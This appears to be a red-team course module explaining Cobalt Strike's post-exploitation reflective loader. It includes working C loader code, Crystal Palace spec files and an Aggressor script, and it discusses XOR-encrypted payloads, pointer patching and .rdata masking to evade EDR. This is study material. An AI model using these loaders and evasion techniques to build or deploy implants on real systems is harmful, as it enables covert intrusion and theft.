Difficulty: Advanced

Module 7: Post-Ex UDRL & Aggressor Integration

The postex loader, $GMH/$GPA patching, string-based DFR, Aggressor hooks, and the complete build pipeline from C source to deployed Beacon.

Module Objective

Understand how Cobalt Strike's post-exploitation DLLs are loaded by a separate, simplified UDRL. You will learn how the postex loader differs from the Beacon UDRL, how it receives API resolution capabilities from its parent Beacon via $GMH/$GPA patching, and how the Aggressor script ties the entire Crystal-Loaders system together. By the end of this module you will be able to trace a complete payload from C source through Crystal Palace to a running Beacon on target.

1. What Is Post-Ex?

Cobalt Strike's post-exploitation capabilities — mimikatz, screenshot, keylogger, port scan, hashdump, net commands, and many others — are implemented as standalone DLLs. When an operator runs one of these commands through the Beacon console, Cobalt Strike compiles or selects the appropriate postex DLL and sends it to the running Beacon for execution.

These postex DLLs need their own loader. The initial Beacon UDRL (covered in Modules 5 and 6) loads the Beacon implant itself, but every subsequent postex capability that arrives as a DLL also needs to be reflectively loaded into memory. Cobalt Strike provides a dedicated hook for this purpose: POSTEX_RDLL_GENERATE.

Why a Separate Loader?

The postex loader is architecturally simpler than the Beacon UDRL because it operates in a fundamentally different context. The Beacon is already running, API resolution is already solved, syscall stubs are already resolved, and the BUD (Beacon User Data) is already populated. The postex loader does not need to bootstrap any of this infrastructure — it inherits resolution capabilities from its parent Beacon via function pointer patching.

Key Distinction

The POSTEX_RDLL_GENERATE Aggressor hook allows operators to replace the default postex loader with a custom one — just as BEACON_RDLL_GENERATE allows replacing the Beacon's own loader. Crystal-Loaders provides both: a full-featured Beacon UDRL and a streamlined postex UDRL, each with its own spec file and C source.

2. Key Differences from the Beacon UDRL

The postex loader shares the same Crystal Palace build system and LibTCG PE loading primitives as the Beacon UDRL, but it strips away everything that the parent Beacon already provides. The following table highlights every architectural difference:

Aspect	Beacon UDRL (loader.c)	Post-Ex UDRL (loader.c)
Includes	`beacon.h`, `gate.h`, `tcg.h`	`tcg.h` only
Syscall resolution	Full `SYSCALL_API` via LibGate	None needed
DFR method	`ror13` (hash-based)	`strings` (ASCII name-based)
API resolution	PEB walking via `findModuleByHash`	`$GMH`/`$GPA` from parent Beacon
BUD population	Full `BEACON_USER_DATA`	None
Entry params	`go()` takes no args	`go(void* loaderArguments)`
DllMain calls	3 (BEACON_USER_DATA, ATTACH, START)	2 (ATTACH, START)
Memory tracking	`ALLOCATED_MEMORY_REGION`	`RDATA_SECTION`
Section masking	Full section tracking	`.rdata` capture only

The most striking reduction is in dependencies. The Beacon UDRL includes beacon.h (for BUD structures), gate.h (for LibGate syscalls), and tcg.h (for PE loading). The postex loader only needs tcg.h because it does not resolve syscalls and does not populate BUD. It is purely a PE loading engine with inherited API resolution.

Why This Matters for Evasion

A smaller loader means a smaller PIC blob, which means less code in memory to scan, fewer function calls to trace, and a reduced detection surface. The postex loader also avoids touching the PEB directly (it uses patched-in function pointers instead of PEB walking), which sidesteps PEB access monitoring that some EDR products implement.

3. The $GMH / $GPA Patching Mechanism

The central design question for the postex loader is: how does it resolve Windows API functions without PEB walking and without LibGate? The answer is function pointer patching. The parent Beacon already has resolved addresses for GetModuleHandleA and GetProcAddress. Crystal Palace writes those addresses directly into the postex loader's code before it executes.

Global Function Pointers in .text

The postex loader.c declares two global function pointers with an unusual attribute — they are placed in the .text section instead of .data:

C (postex/loader.c)
// Global function pointers stored in .text section
__typeof__(GetModuleHandleA) * pGetModuleHandle __attribute__((section(".text")));
__typeof__(GetProcAddress)   * pGetProcAddress  __attribute__((section(".text")));

Placing them in .text is deliberate. After Crystal Palace transforms the COFF object into PIC, the .text section becomes the executable code body. By placing the pointers here, they become part of the PIC blob itself — directly addressable via RIP-relative instructions. If they were in .data, Crystal Palace would need to handle an additional data section and relocations.

The patch Directive

The postex spec file uses Crystal Palace's patch directive to write values into these symbol locations:

loader.spec (postex)
name     "Beacon Postex Loader"
describe "PIC loader for Cobalt Strike's postex DLLs"
author   "Daniel Duggan (@_RastaMouse)"

x64:
    load "bin/loader.x64.o"
        make pic +gofirst +optimize +disco
        dfr "resolve" "strings"
        patch "pGetModuleHandle" $GMH
        patch "pGetProcAddress"  $GPA
        mergelib "../libtcg.x64.zip"

    generate $KEY 128
    push $DLL
        xor $KEY
        preplen
        link "dll"
    push $KEY
        preplen
        link "key"
    export

The $GMH and $GPA variables are not defined in the spec itself. They are provided externally by the Aggressor script at runtime, which receives them from Cobalt Strike as parameters to the POSTEX_RDLL_GENERATE hook. Crystal Palace resolves the symbol names "pGetModuleHandle" and "pGetProcAddress" in the COFF object's symbol table and overwrites those locations with the 8-byte addresses provided by $GMH and $GPA.
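
The effect of a patch step can be pictured with a small, portable simulation. This is only a sketch under stated assumptions, not Crystal Palace's implementation: `symbol_t`, `patch_symbol`, and `read_slot` are hypothetical names invented for illustration, the "blob" is an ordinary byte array, and the value is assumed to be stored as 8 little-endian bytes, as it would be on x64.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for a linker's view of one symbol: its name and
 * the byte offset of its storage inside the blob. */
typedef struct {
    const char *name;
    size_t      offset;
} symbol_t;

/* Overwrite the 8-byte slot of the named symbol with `value`, stored
 * little-endian. Returns 0 on success, -1 if the symbol is unknown or
 * the slot would run past the end of the blob. */
int patch_symbol(uint8_t *blob, size_t blob_len,
                 const symbol_t *symbols, size_t symbol_count,
                 const char *name, uint64_t value)
{
    assert(blob != NULL && symbols != NULL && name != NULL);

    for (size_t i = 0; i < symbol_count; i++) {
        if (strcmp(symbols[i].name, name) != 0)
            continue;
        if (symbols[i].offset > blob_len || blob_len - symbols[i].offset < 8)
            return -1;
        for (int b = 0; b < 8; b++)
            blob[symbols[i].offset + b] = (uint8_t)(value >> (8 * b));
        return 0;
    }
    return -1;
}

/* Read an 8-byte little-endian slot back, the way code inside the blob
 * would see the patched pointer. */
uint64_t read_slot(const uint8_t *blob, size_t offset)
{
    uint64_t v = 0;
    for (int b = 0; b < 8; b++)
        v |= (uint64_t)blob[offset + b] << (8 * b);
    return v;
}
```

Calling `patch_symbol` with a symbol table that maps `pGetModuleHandle` to some offset, then `read_slot` at that offset, returns the value that was patched in. The point of the sketch is that the pointer slots are fixed locations inside the blob, filled in once at link time.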

$GMH / $GPA Patching Flow

Parent Beacon (has resolved GMH/GPA) → CS Engine (passes to Aggressor hook) → Crystal Palace (patch directive) → PIC Blob (pointers baked in .text)

Comparing Spec Directives: Beacon vs Post-Ex

Directive	Beacon Spec	Post-Ex Spec
`dfr`	`"resolve" "ror13"`	`"resolve" "strings"`
`patch`	Not used	`patch "pGetModuleHandle" $GMH` `patch "pGetProcAddress" $GPA`
`mergelib`	LibGate + LibTCG	LibTCG only

4. The Post-Ex resolve() Function

Because the postex spec uses dfr "resolve" "strings", Crystal Palace rewrites all __imp_MODULE$Function references to call resolve() with ASCII string arguments instead of ROR13 hashes. The postex resolve() function is correspondingly different from the Beacon UDRL's version:

C (postex/loader.c)
char * resolve(char * module, char * function)
{
    HANDLE hModule = pGetModuleHandle(module);

    if (hModule == NULL)
        hModule = LoadLibraryA(module);

    return pGetProcAddress(hModule, function);
}

This function is deceptively simple, but every line is significant:

Line-by-Line Analysis

Line	What It Does
`pGetModuleHandle(module)`	Attempts to get a handle to the module using the patched `$GMH` pointer. This succeeds if the DLL is already loaded in the process (e.g., `kernel32.dll`, `ntdll.dll`).
`if (hModule == NULL)`	If the module is not already loaded, the function needs to load it first. This happens when postex DLLs import from less common DLLs.
`LoadLibraryA(module)`	Calls `LoadLibraryA` directly to load the module. This is available as a plain function call because it comes from `<windows.h>` and is not DFR-decorated.
`pGetProcAddress(hModule, function)`	Finally resolves the target function from the (now loaded) module and returns its address.

Comparison with Beacon UDRL resolve()

Beacon UDRL resolve()

Takes two DWORD hashes (ROR13)
Walks the PEB's InMemoryOrderModuleList
Hashes each module name, compares against moduleHash
Walks export table, hashes each function name
No dependency on any external function pointers
Fully self-contained — works from a cold start

Post-Ex resolve()

Takes two ASCII strings (module name, function name)
Calls pGetModuleHandle (patched $GMH)
Falls back to LoadLibraryA (direct call, not DFR-decorated) if module not loaded
Calls pGetProcAddress (patched $GPA)
Depends on parent Beacon's function pointers
Cannot operate independently — requires a running Beacon

5. RDATA_SECTION Tracking

The Beacon UDRL tracks all allocated memory regions via ALLOCATED_MEMORY_REGION structures in the BUD. The postex loader uses a simpler tracking mechanism: it captures only the .rdata section's location and size.

C (postex/loader.c)
typedef struct {
    char * start;      // Start address of .rdata
    DWORD  length;     // Size of .rdata
    DWORD  offset;     // Offset of IAT within .rdata
} RDATA_SECTION;

Why Track .rdata?

Long-running postex DLLs — such as the keylogger, screenshot capture loop, or port scanner — persist in memory for extended periods. While they are idle between operations, their memory is vulnerable to scanning. The .rdata section is the highest-value forensic target because it contains:

What Lives in .rdata

The Import Address Table (IAT) — An array of resolved function pointers to APIs in ntdll.dll, kernel32.dll, and other system DLLs. These pointers are recognizable patterns: consecutive addresses within the same DLL's export range.
String literals — Read-only strings used by the postex DLL (error messages, format strings, registry key paths).
Virtual function tables — For C++ postex DLLs, vtable pointers reside in .rdata.
Constant data — Any const global data the compiler places in read-only sections.

The loader passes a pointer to the RDATA_SECTION structure as the third (reserved) argument of the DLL_PROCESS_ATTACH call: entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, &rdata). With that information, the DLL can XOR-encrypt or zero its own .rdata section while idle. In the XOR case, when it needs to run again, it decrypts the section, performs its operation, and re-encrypts. This pattern is the postex equivalent of the sleep mask technique used by the Beacon itself.

RDATA Obfuscation Lifecycle

Postex DLL loaded (.rdata populated with IAT) → Operation completes (keylogger cycle done) → XOR encrypt .rdata (using RDATA_SECTION info) → Idle (no readable IAT in memory)

6. The Post-Ex go() Function

The postex go() function is the entry point of the PIC blob. Crystal Palace places it at byte offset 0 via the +gofirst flag. Unlike the Beacon UDRL's go() (which takes no arguments), the postex version receives a loaderArguments pointer from the parent Beacon:

C (postex/loader.c)
void go(void * loaderArguments)
{
    RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
    RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);

    // XOR unmask the encrypted postex DLL
    char * src = KERNEL32$VirtualAlloc(
        NULL, dll->length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    for (DWORD i = 0; i < dll->length; i++)
        src[i] = dll->value[i] ^ key->value[i % key->length];

    // Parse the decrypted PE
    DLLDATA data;
    ParseDLL(src, &data);

    // Allocate and load sections
    IMPORTFUNCS funcs;
    DWORD size = SizeOfDLL(&data);
    char * dst = KERNEL32$VirtualAlloc(
        NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LoadDLL(&data, dst);
    ProcessImports(&funcs, &data, dst);

    // Fix permissions and capture .rdata info
    RDATA_SECTION rdata;
    FixSectionPermissions(&data, dst, &rdata);

    // Get entry point and clean up decryption buffer
    DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);
    KERNEL32$VirtualFree(src, 0, MEM_RELEASE);

    // Two DllMain calls (no USER_DATA needed)
    entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, &rdata);               // pass rdata info
    entryPoint((HINSTANCE)GETRESOURCE(go), 0x04, loaderArguments);  // start with loader args
}

Each phase of this function maps directly to a stage in the loading process:

Phase-by-Phase Breakdown

Phase	Lines	What Happens
Resource Retrieval	`GETRESOURCE`	The `_DLL_` and `_KEY_` macros resolve to named sections that Crystal Palace linked into the PIC blob. `GETRESOURCE` uses RIP-relative addressing to locate them.
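XOR Decryption	`VirtualAlloc` + XOR loop	Allocates a RW buffer (`src`) and decrypts the postex DLL with a repeating-key XOR: byte `i` is XORed with key byte `i % key->length`, where the key is the 128-byte value produced by `generate $KEY 128`. The decrypted buffer is a raw PE file.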
PE Parsing	`ParseDLL`	LibTCG parses the PE headers, section table, import directory, and relocation table into a `DLLDATA` structure.
Section Loading	`LoadDLL`	Allocates the final image region (RW) and copies each PE section to its correct virtual address offset.
Import Resolution	`ProcessImports`	Takes an `IMPORTFUNCS` struct, the `DLLDATA`, and `dst`. Walks the import directory and resolves each function using the DFR-rewritten `resolve()`, which delegates to the patched `$GMH`/`$GPA`.
Permission Fixing	`FixSectionPermissions`	Sets correct page protections for each section (`.text` to RX, `.rdata` to R, `.data` to RW). Captures `.rdata` boundaries into the `RDATA_SECTION` struct.
Cleanup	`VirtualFree`	Releases the temporary decryption buffer (`src`). The encrypted DLL data and XOR key are no longer needed.
DllMain #1	`DLL_PROCESS_ATTACH`	Calls the postex DLL's entry point with `(HINSTANCE)dst` and `&rdata` as the reserved parameter, giving it the information needed for .rdata obfuscation.
DllMain #2	`0x04`	Calls DllMain again with reason `0x04`, passing `(HINSTANCE)GETRESOURCE(go)` as the module handle and `loaderArguments` from the parent Beacon, starting the actual postex operation (mimikatz dump, screenshot capture, etc.).
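
The resource layout and the XOR step from the table above can be tried out in isolation on ordinary buffers. The following is a minimal sketch, not the LibTCG or Crystal Palace code: `xor_repeating`, `pack_prefixed`, and `unpack_prefixed` are hypothetical helper names, and the 4-byte little-endian length prefix is an assumption made for illustration (the source only shows that a resource exposes `length` and `value`).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Apply a repeating-key XOR in place. Because XOR is its own inverse,
 * the same call both masks and unmasks a buffer. */
void xor_repeating(uint8_t *buf, size_t len,
                   const uint8_t *key, size_t key_len)
{
    assert(key_len > 0);
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % key_len];
}

/* Pack `data` as [4-byte little-endian length][bytes] (assumed layout).
 * Returns the number of bytes written, or 0 if `out` is too small. */
size_t pack_prefixed(uint8_t *out, size_t out_cap,
                     const uint8_t *data, uint32_t len)
{
    if (out_cap < 4 || out_cap - 4 < len)
        return 0;
    for (int b = 0; b < 4; b++)
        out[b] = (uint8_t)(len >> (8 * b));
    memcpy(out + 4, data, len);
    return 4 + (size_t)len;
}

/* Read the length prefix and return a pointer to the value bytes.
 * Returns NULL if the input is shorter than the prefix claims. */
const uint8_t *unpack_prefixed(const uint8_t *in, size_t in_len,
                               uint32_t *len_out)
{
    if (in_len < 4)
        return NULL;
    uint32_t len = 0;
    for (int b = 0; b < 4; b++)
        len |= (uint32_t)in[b] << (8 * b);
    if (in_len - 4 < len)
        return NULL;
    *len_out = len;
    return in + 4;
}
```

A round trip masks a buffer with `xor_repeating`, packs it with `pack_prefixed`, recovers the bytes with `unpack_prefixed`, and applies `xor_repeating` again with the same key to get the original data back. The length check in `unpack_prefixed` is a design choice of this sketch; the `go()` listing above trusts the embedded length.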

Contrast with Beacon UDRL go()

The Beacon UDRL's go() function makes three DllMain calls:

Beacon UDRL: Three DllMain Calls

entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud) — passes the BEACON_USER_DATA structure using the special DLL_BEACON_USER_DATA reason code and (HINSTANCE)0 as the module handle
entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL) — standard DLL initialization with the actual loaded image base
entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL) — starts the Beacon main loop

The postex loader skips the first call entirely because there is no BEACON_USER_DATA to pass. Postex DLLs do not need syscall stubs or memory region tracking — they operate within the context of an already-running Beacon that handles those concerns.

7. The Aggressor Script (crystalpalace.cna)

The Aggressor script is the glue that connects Crystal Palace to Cobalt Strike's runtime. It implements the hooks that Cobalt Strike calls when it needs to generate loader payloads, passing the appropriate parameters to the Crystal Palace linker.

Java/Sleep (crystalpalace.cna)
import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;

set BEACON_RDLL_GENERATE {
    local('$spec $spec_path $result');

    # $1 = filename, $2 = beacon DLL bytes, $3 = arch
    if ($3 eq "x86") { return $null; }  # x64 only

    $spec_path = getFileProper(script_resource("udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    # Empty map: the Beacon spec has no external variables to patch
    $result = [$spec run: $2, [new HashMap]];

    if (strlen($result) == 0) {
        warn("Crystal Palace: BEACON_RDLL_GENERATE failed");
        return $null;
    }

    return $result;
}

set BEACON_RDLL_SIZE {
    return "0";  # dynamic size
}

set POSTEX_RDLL_GENERATE {
    local('$spec $spec_path $hashMap $result');

    # $1 = filename, $2 = postex DLL bytes, $3 = arch
    # $4 = beacon ID, $5 = $GMH, $6 = $GPA
    if ($3 eq "x86") { return $null; }  # x64 only

    $spec_path = getFileProper(script_resource("postex-udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];

    # Variables consumed by the spec's patch directives
    $hashMap = [new HashMap];
    [$hashMap put: "\$GMH", cast($5, 'b')];
    [$hashMap put: "\$GPA", cast($6, 'b')];

    $result = [$spec run: $2, $hashMap];

    if (strlen($result) == 0) {
        warn("Crystal Palace: POSTEX_RDLL_GENERATE failed");
        return $null;
    }

    return $result;
}

The three hooks each serve a distinct purpose in the payload generation pipeline. Note that in Cobalt Strike's Sleep language, the set keyword assigns named hook callbacks (such as RDLL hooks), while on registers event handlers — these are different mechanisms. The import java.util.HashMap at the top makes the Java HashMap class available for passing patch variables.

BEACON_RDLL_GENERATE

Hook: BEACON_RDLL_GENERATE

When it fires: Every time Cobalt Strike generates a Beacon payload (HTTP listener, HTTPS listener, SMB pipe, etc.).

Parameters received:

$1 — The filename hint (e.g., "beacon.dll")
$2 — The raw Beacon DLL bytes (the PE file that needs to be loaded)
$3 — The architecture string ("x86" or "x64")

What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the Beacon UDRL spec. Feeds it the Beacon DLL bytes (which become $DLL in the spec) and returns the complete PIC payload. The new HashMap is empty because the Beacon spec has no external variables to patch. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.

Return value: The final PIC shellcode blob, or $null if the architecture is x86 (Crystal-Loaders is x64-only) or if Crystal Palace fails.

BEACON_RDLL_SIZE

Hook: BEACON_RDLL_SIZE

When it fires: Before BEACON_RDLL_GENERATE, to determine how much space to reserve for the loader.

Return value: "0" indicates the loader size is dynamic. Crystal Palace determines the exact size at link time based on the code, libraries, and encrypted payload. Returning "0" tells Cobalt Strike not to pre-allocate a fixed buffer but to accept whatever size Crystal Palace produces.

POSTEX_RDLL_GENERATE

Hook: POSTEX_RDLL_GENERATE

When it fires: Every time an operator runs a postex command (mimikatz, screenshot, keylogger, etc.) that requires loading a DLL into the Beacon process.

Parameters received:

$1 — The filename hint (e.g., "mimikatz.dll")
$2 — The raw postex DLL bytes
$3 — The architecture string
$4 — The parent Beacon's ID (integer)
$5 — The parent Beacon's GetModuleHandleA address ($GMH)
$6 — The parent Beacon's GetProcAddress address ($GPA)

What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the postex spec. Constructs a HashMap containing $GMH and $GPA as byte arrays (via cast($5, 'b')), and passes both the DLL bytes and the hash map to Crystal Palace. The patch directives in the spec resolve $GMH and $GPA from this hash map. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.

Return value: The complete postex PIC payload with patched-in function pointers, or $null on failure.

The HashMap is the Bridge

The key insight is how data flows from Cobalt Strike through Aggressor into Crystal Palace. The $GMH and $GPA values originate from the running Beacon on the target machine. Cobalt Strike resolves them from Beacon's process context, passes them as parameters to the Aggressor hook, and the script packages them into a HashMap that Crystal Palace reads when processing patch directives. By the time the PIC blob is assembled, the correct function addresses are baked directly into the shellcode's .text section.

8. The Full Build Pipeline

From writing C source code to a running Beacon on target, the Crystal-Loaders system involves eight distinct stages. The following diagram traces the complete pipeline:

Complete Crystal-Loaders Build Pipeline

1. Write C Loader — Author loader.c with go() entry point, resolve() function, and PE loading logic using LibTCG primitives.

2. Compile with MinGW — x86_64-w64-mingw32-gcc -c loader.c -o bin/loader.x64.o produces a COFF object file. The -c flag stops before linking.

3. Write Spec File — Author loader.spec defining the PIC transformation, DFR method, library merges, payload encryption, and data linking.

4. CS Triggers Hook — At runtime, Cobalt Strike fires BEACON_RDLL_GENERATE (or POSTEX_RDLL_GENERATE), passing the raw DLL bytes and architecture info to the Aggressor script.

5. Aggressor Loads Spec — The .cna script calls LinkSpec Parse to load and parse the spec file, preparing the Crystal Palace linker engine.

6. Crystal Palace Executes — The linker performs six sub-operations:

Crystal Palace Sub-Operations (Step 6)

Sub-Step	Operation	Result
6a	Load `loader.x64.o`	COFF object loaded into linker memory
6b	`make pic +gofirst +optimize +disco`	COFF transformed to PIC with `go()` at offset 0
6c	`dfr "resolve" "ror13"` (or `"strings"`)	All DLL import references rewritten to call `resolve()`
6d	`mergelib` LibGate + LibTCG (or LibTCG only)	Library code merged into the PIC blob
6e	`generate $KEY 128`	128-byte random XOR key created
6f	`push $DLL` / `xor` / `preplen` / `link`	DLL XOR-encrypted, length-prefixed, linked as named section

7. CS Wraps PIC Blob — Cobalt Strike takes the exported PIC blob and wraps it into the appropriate delivery mechanism (stager shellcode, staged payload, or raw artifact).

8. Execution on Target — The stager delivers the PIC blob to the target process. Execution begins at byte 0 (go()). The loader decrypts the embedded DLL, loads it via LibTCG, resolves imports via DFR, and calls DllMain to start Beacon.

Pipeline Summary

The pipeline transforms human-readable C code into a flat, encrypted, position-independent shellcode blob that loads a full-featured DLL implant from memory. No traditional PE file persists in the target process's memory: the DLL is encrypted inside the PIC blob, exists as a raw PE only briefly in the temporary decryption buffer, is loaded section-by-section into a final allocation, and the temporary buffer is then freed. The only persistent artifacts are the PIC code itself (which has no PE headers) and the loaded DLL sections (which have correct per-section permissions instead of a single RWX blob).
